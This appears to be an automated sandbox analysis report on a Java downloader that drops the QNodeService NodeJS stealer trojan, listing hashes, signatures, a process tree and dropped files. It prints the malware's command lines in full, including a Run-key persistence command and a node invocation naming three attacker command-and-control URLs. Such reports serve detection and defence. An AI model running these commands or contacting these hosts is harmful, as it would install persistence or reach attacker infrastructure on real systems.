Analysis
- max time kernel: 130s
- max time network: 150s
- platform: windows10_x64
- resource: win10v200430
- submitted: 13-07-2020 07:01
Static task: static1
Behavioral task: behavioral1
  Sample: FOB QUOTES #092072DB6720.jar
  Resource: win7
Behavioral task: behavioral2
  Sample: FOB QUOTES #092072DB6720.jar
  Resource: win10v200430
General
- Target: FOB QUOTES #092072DB6720.jar
- Size: 11KB
- MD5: e20d2d6fff672f1fd2350f2360a1545b
- SHA1: 712f836273a071a663ab7eae9f7970e26aa0a449
- SHA256: 54e843dde1d016b723f35de3ccf83e604edcfd9ba617da576de730f2ce971031
- SHA512: 8736ba22203332e491784a9271ec68c258f147f420b5bda7952d50920f25cab73b8a68144c57f981934098454cdeb99abe628b2d0e4d77e919d25b153d377ad6
Malware Config
Signatures
- Executes dropped EXE (2 IoCs)
  Processes (pid | process):
    3796 | node.exe
    2560 | node.exe
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes (pid | process):
    2560 | node.exe
    2560 | node.exe
- Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes (flow | ioc):
    11 | wtfismyip.com
    12 | wtfismyip.com
- QNodeService
  QNodeService is a trojan written in NodeJS and spread via a Java downloader. It includes stealer functionality.
- Suspicious use of WriteProcessMemory (8 IoCs)
  Processes (description | pid process | target process):
    PID 1616 wrote to memory of 3796 | 1616 java.exe | node.exe
    PID 1616 wrote to memory of 3796 | 1616 java.exe | node.exe
    PID 3796 wrote to memory of 2128 | 3796 node.exe | cmd.exe
    PID 3796 wrote to memory of 2128 | 3796 node.exe | cmd.exe
    PID 2128 wrote to memory of 2484 | 2128 cmd.exe | reg.exe
    PID 2128 wrote to memory of 2484 | 2128 cmd.exe | reg.exe
    PID 3796 wrote to memory of 2560 | 3796 node.exe | node.exe
    PID 3796 wrote to memory of 2560 | 3796 node.exe | node.exe
- QNodeService NodeJS Trojan (1 IoC)
  Processes (resource | yara_rule):
    C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js | family_qnodeservice
- Adds Run entry to start application (2 TTPs, 2 IoCs)
  Processes (description | ioc | process):
    Key created | \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | reg.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Run\qnodejs-62bf2258 = "cmd /D /C \"C:\\Users\\Admin\\qnodejs-node-v13.13.0-win-x64\\qnodejs\\qnodejs-62bf2258.cmd\"" | reg.exe
- Checks processor information in registry (2 TTPs, 6 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes (description | ioc | process):
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | node.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | node.exe
    Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | node.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz | node.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | node.exe
    Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | node.exe
- Loads dropped DLL (4 IoCs)
  Processes (pid | process):
    2560 | node.exe
    2560 | node.exe
    2560 | node.exe
    2560 | node.exe
Processes
- C:\ProgramData\Oracle\Java\javapath\java.exe (PID 1616)
  Command line: java -jar "C:\Users\Admin\AppData\Local\Temp\FOB QUOTES #092072DB6720.jar"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe (PID 3796)
    Command line: C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js start --group user:[email protected] --register-startup --central-base-url https://payday.kozow.com --central-base-url https://lestero.hopto.org --central-base-url https://frendas.linkpc.net
    Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
    - C:\Windows\system32\cmd.exe (PID 2128)
      Command line: C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-62bf2258" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-62bf2258.cmd\"""
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\reg.exe (PID 2484)
        Command line: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-62bf2258" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-62bf2258.cmd\""
        Signatures: Adds Run entry to start application
    - C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe (PID 2560)
      Command line: C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-win32-x64.js serve start --group user:[email protected] --register-startup --central-base-url https://payday.kozow.com --central-base-url https://lestero.hopto.org --central-base-url https://frendas.linkpc.net
      Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Checks processor information in registry; Loads dropped DLL
Network
MITRE ATT&CK Enterprise v6
Downloads
- C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe
- C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe
- C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-win32-x64.js
- C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js
- \Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\node_modules\ffi-napi\prebuilds\win32-x64\node.napi.node
- \Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\node_modules\native-reg\prebuilds\win32-x64\node.napi.node
- \Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\node_modules\ref-napi\prebuilds\win32-x64\node.napi.node
- \Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\node_modules\sqlite3\lib\binding\node-v79-win32-x64\node_sqlite3.node
- memory/2128-110-0x0000000000000000-mapping.dmp
- memory/2484-111-0x0000000000000000-mapping.dmp
- memory/2560-112-0x0000000000000000-mapping.dmp
- memory/2560-114-0x000001032B700000-0x000001032B701000-memory.dmp (Filesize: 4KB)
- memory/3796-106-0x0000000000000000-mapping.dmp
- memory/3796-108-0x00000204ABAC0000-0x00000204ABAC1000-memory.dmp (Filesize: 4KB)